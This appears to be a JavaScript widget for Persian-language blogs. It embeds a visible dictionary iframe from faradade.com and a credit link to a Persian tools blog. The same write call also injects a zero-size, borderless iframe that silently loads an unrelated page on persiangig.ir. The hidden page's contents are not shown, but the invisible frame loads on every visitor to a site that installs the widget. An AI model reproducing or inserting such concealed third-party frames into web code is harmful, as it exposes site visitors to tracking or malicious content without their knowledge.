﻿
var ic = 1; 

var title = new Array(ic);



title[0] = '<CENTER><IFRAME SRC="http://faradade.com/frameservices.aspx?service=dic&bg=ffffff&color=000000" width=200 height=130 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling="no"></IFRAME></CENTER>';


function pickRandom(range) { 

if (Math.random) 

	return Math.round(Math.random() * (range-1)); 

else { 

var now = new Date(); 

return (now.getTime() / 1000) % range; } } 

var choice = pickRandom(ic); 

document.writeln('<CENTER><dir="rtl">'+ title[choice] +'<a target=_blank title="ابزارهای جدید و رایگان فارسی" href="http://javapix.MihanBlog.Com">javapix</a><!-- !Coded by  Mohsen Razani RAD - RADWEB.BLOGFA.COM --><IFRAME SRC="http://zedsmr.persiangig.ir/mohsen.html" width=00 height=00 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling="no"></IFRAME><CENTER>');

